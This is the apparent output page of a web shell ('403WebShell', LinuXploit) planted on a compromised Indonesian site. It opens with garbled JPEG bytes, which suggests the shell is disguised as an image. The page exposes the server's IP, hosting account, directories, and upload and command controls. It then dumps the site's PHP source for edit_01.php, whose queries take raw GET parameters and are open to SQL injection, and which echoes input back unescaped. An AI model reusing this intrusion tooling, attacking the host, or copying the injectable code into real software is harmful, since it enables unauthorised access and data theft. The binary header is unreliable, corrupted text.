JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 77.37.66.228  /  Your IP : 216.73.216.163
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/edit_01.php
<?php include "header.php"; ?>
<?php
$id_user=$_SESSION["npm"];
$username=$_SESSION["level"];


?>


<style type="text/css">
<!--
.style2 {
	font-size: 12px;
	font-weight: bold;
}
.style3 {font-size: 12px}
-->

@import url(http://fonts.googleapis.com/css?family=Montserrat:400,700);

html{    background:url(http://thekitemap.com/images/feedback-img.jpg) no-repeat;
  background-size: cover;
  height:100%;
}

#feedback-page{
	text-align:center;
}

#form-main{
	width:100%;
	float:left;
	padding-top:0px;
}

#form-div {
	background-color:rgba(72,72,72,0.4);
	padding-left:35px;
	padding-right:35px;
	padding-top:35px;
	padding-bottom:50px;
	width: 450px;
	float: left;
	left: 50%;
	position: absolute;
  margin-top:30px;
	margin-left: -260px;
  -moz-border-radius: 7px;
  -webkit-border-radius: 7px;
}

.feedback-input {
	color:#3c3c3c;
	font-family: Helvetica, Arial, sans-serif;
  font-weight:500;
	font-size: 18px;
	border-radius: 0;
	line-height: 22px;
	background-color: #fbfbfb;
	padding: 13px 13px 13px 54px;
	margin-bottom: 10px;
	width:100%;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	-ms-box-sizing: border-box;
	box-sizing: border-box;
  border: 3px solid rgba(0,0,0,0);
}

.feedback-input:focus{
	background: #fff;
	box-shadow: 0;
	border: 3px solid #3498db;
	color: #3498db;
	outline: none;
  padding: 13px 13px 13px 54px;
}

.focused{
	color:#30aed6;
	border:#30aed6 solid 3px;
}

/* Icons ---------------------------------- */
#name{
	background-image: url(http://rexkirby.com/kirbyandson/images/name.svg);
	background-size: 30px 30px;
	background-position: 11px 8px;
	background-repeat: no-repeat;
}

#name:focus{
	background-image: url(http://rexkirby.com/kirbyandson/images/name.svg);
	background-size: 30px 30px;
	background-position: 8px 5px;
  background-position: 11px 8px;
	background-repeat: no-repeat;
}

#email{
	background-image: url(http://rexkirby.com/kirbyandson/images/email.svg);
	background-size: 30px 30px;
	background-position: 11px 8px;
	background-repeat: no-repeat;
}

#email:focus{
	background-image: url(http://rexkirby.com/kirbyandson/images/email.svg);
	background-size: 30px 30px;
  background-position: 11px 8px;
	background-repeat: no-repeat;
}

#comment{
	background-image: url(http://rexkirby.com/kirbyandson/images/comment.svg);
	background-size: 30px 30px;
	background-position: 11px 8px;
	background-repeat: no-repeat;
}

textarea {
    width: 100%;
    height: 150px;
    line-height: 150%;
    resize:vertical;
}

input:hover, textarea:hover,
input:focus, textarea:focus {
	background-color:white;
}

#button-blue{
	font-family: 'Montserrat', Arial, Helvetica, sans-serif;
	float:left;
	width: 100%;
	border: #fbfbfb solid 4px;
	cursor:pointer;
	background-color: #3498db;
	color:white;
	font-size:24px;
	padding-top:22px;
	padding-bottom:22px;
	-webkit-transition: all 0.3s;
	-moz-transition: all 0.3s;
	transition: all 0.3s;
  margin-top:-4px;
  font-weight:700;
}

#button-blue:hover{
	background-color: rgba(0,0,0,0);
	color: #0493bd;
}
	
.submit:hover {
	color: #3498db;
}
	
.ease {
	width: 0px;
	height: 74px;
	background-color: #fbfbfb;
	-webkit-transition: .3s ease;
	-moz-transition: .3s ease;
	-o-transition: .3s ease;
	-ms-transition: .3s ease;
	transition: .3s ease;
}

.submit:hover .ease{
  width:100%;
  background-color:white;
}

@media only screen and (max-width: 580px) {
	#form-div{
		left: 3%;
		margin-right: 3%;
		width: 88%;
		margin-left: 0;
		padding-left: 3%;
		padding-right: 3%;
	}
</style>

<div class="container">

				<?php
				$view = isset($_GET['view']) ? $_GET['view'] : null;

				switch($view){
					default:
					?>
						<div class="panel panel-primary">



							<div class="panel-heading">
								<h3 class="panel-title">Data Supervisor / Sales</h3>
						  </div>
						  
	    <div class="panel-body">
								<h3 class="panel-title"><center><?php echo $_GET ['project'];?></center></h3>
								<br>
						<br>
					<table class="table table-bordered table-striped">
					<thead>
					<tr>
						<th scope="col">No.</th>
						<th scope="col">ID User</th>
						<th scope="col">Nama</th>
						<th scope="col">Supervisor</th>
						<th scope="col">Status</th>
						<th scope="col">Action</th>
						
					</tr>
					</thead>
				<?php 
				
				   $project = $_GET ['project'];
				
					$sql = mysqli_query($konek,"select *  from mahasiswa where project='$project' AND status='aktif'  order by nama_mhs asc");
					$no=1;
					while($d=mysqli_fetch_array($sql)){
						echo "<tr>
							<td data-header='No'>$no</td>
							<td data-header='ID User'>$d[npm]</td>
							<td data-header='Nama'>$d[nama_mhs]</td>
							<td data-header='Nama'>$d[supervisor]</td>
							<td data-header='Status'>$d[status]</td>

							<td data-header='Action'>
								
	
								  <a class='btn btn-danger' style='margin-bottom: 10px' href='edit_01.php?id=$d[id]&view=edit'>Edit</a> | 
								  <a class='btn btn-primary' style='margin-bottom: 10px' href='edit_admin.php?id=$d[id]&view=edit'>Reset pasword</a>
								</td>
								
						</tr>";
						$no++;
					}
					?>
				</table>
							
             </div>
				
				
				
	<?php
		break;
		case "edit":
				
	?>
				   <div class="panel panel-primary">
				   <br><br>
				   
					<div class="panel-heading">
								
					<h3 class="panel-title">Tambah Data Supervisor/Manager/Sales</h3>
					</div>			

			  <div id="form-main">
			  <div id="form-div">
			  									<?php 						
								
								if(isset($_GET['nama'])){
									
											if($_GET['nama'] == "kosong")
											{
												echo "<h4 style='color:red'> Nama tidak boleh kosong !</h4>";
											}
											
									    }
										
										if(isset($_GET['nama'])){
									
											if($_GET['nama'] == "kosong")
											{
												echo "<h4 style='color:red'> Nama tidak boleh kosong !</h4>";
											}
											
											
									    }
										
								?>
						<?php
						 
						 
								if(isset($_GET["hasil"])){
									if($_GET["hasil"] == "gagal"){
										echo "<h4 style='color:red'> No ID Sudah ada !</h4>";
									} else {
										echo "Data berhasil diinput";
									}
								}
							?>
				
				
				<br>
				<br>
<?php

  
$sqlEdit = mysqli_query($konek, "SELECT * FROM mahasiswa WHERE id='$_GET[id]'");
$e=mysqli_fetch_array($sqlEdit);

$project = $e['project'];
$id 	= $e['id'];
$npm 	= $e['npm'];
$nama 	= $e['nama_mhs'];
$supervisor	= $e['supervisor'];
$level   = $e['level'];
$gambar       = $e['gambar'];
$logo      = $e['gambar2'];
$pasword     = $e['password'];
$aktif     = $e['status'];

?>				
				<form  method="POST" action="multi7.php" enctype="multipart/form-data" >
				
				  <label for="npm">ID USER</label><br>
					<input name="id" class="form-control" readonly value="<?php echo $id ?>" />
				  </p>
				
				  <label for="npm">Project</label><br>
					<input name="project" class="form-control" readonly value="<?php echo $project ?>" />
				  </p>
   
				  <label for="npm">NIP</label><br>
					<input name="npm" class="form-control" readonly  value="<?php echo $npm ?>" />
				  </p>
					  <label for="sales">Nama</label><br>
					<input name="sales"  class="form-control"  placeholder="Isi Nama Sales"  value="<?php echo $nama ?>" />
				  </p>
			
			
			
					 <label for="supervisor">Supervisor</label><br>
					<select name="supervisor" class="form-control">
											<option value="<?php echo $e['supervisor']; ?>" selected><?php echo $e['supervisor']; ?></option>
												<?php
												$sqlKelas = mysqli_query($konek, "select distinct(supervisor) from mahasiswa where project='$project' AND level='supervisor'  order by supervisor ASC");
												while($k=mysqli_fetch_array($sqlKelas)){
													?>
													<option value="<?php echo $k['supervisor']; ?>"><?php echo $k['supervisor']; ?></option>
													<?php
												}
												?>
											</select>
																							
											</p>
											
				  	<label for="sales">Level </label><br>
				    <select name="level" class="form-control">
                    <option value="<?php echo $level ?>" selected><?php echo $level ?>
				
										<option value="user">user</option>
										<option value="supervisor">supervisor</option>
										<option value="manager">manager</option>
              							<option value="superadmin">superadmin</option>
              </select>

				    </p>
					
					
			 <label for="level">Status</label><br>
					<select  class="form-control" name="status" id="status">
					  <option value="<?php echo $aktif ?>" selected><?php echo $aktif ?>
					
										<option value="aktif">aktif</option>
										<option value="nonaktif">nonaktif</option>
									    </select>
											</p>
					
				  

				  
				     <label>Foto User</label>
					    </br>
					  <img src="../file/<?php echo $gambar; ?>" style="width: 120px;float: left;margin-bottom: 5px;">
					  </br>
					   </br>
					    </br>
						</br>
						 </br>
						  </br>
						   </br>
					  <input type="file" name="file" />
					  <i style="float: left;font-size: 11px;color: red">Abaikan jika tidak merubah gambar produk</i>
		  
  				</p> 
				</br>
				<label for="sales">Gambar logo</label><br>
					<input name="logo"  class="form-control"  placeholder="Isi logo gambar"  value="<?php echo $logo ?>" />
				  </p>  
				  
				    				  
			      </p>
					<p>&nbsp;</p>
					<div class="submit">
							<input type="submit"   id="button-blue" value="Submit" />
							<div class="ease">
					       </div>
				    </div>
				</form>
			  </div>	
				

				<?php
					break;
				}
				?>



Youez - 2016 - github.com/yon3zu
LinuXploit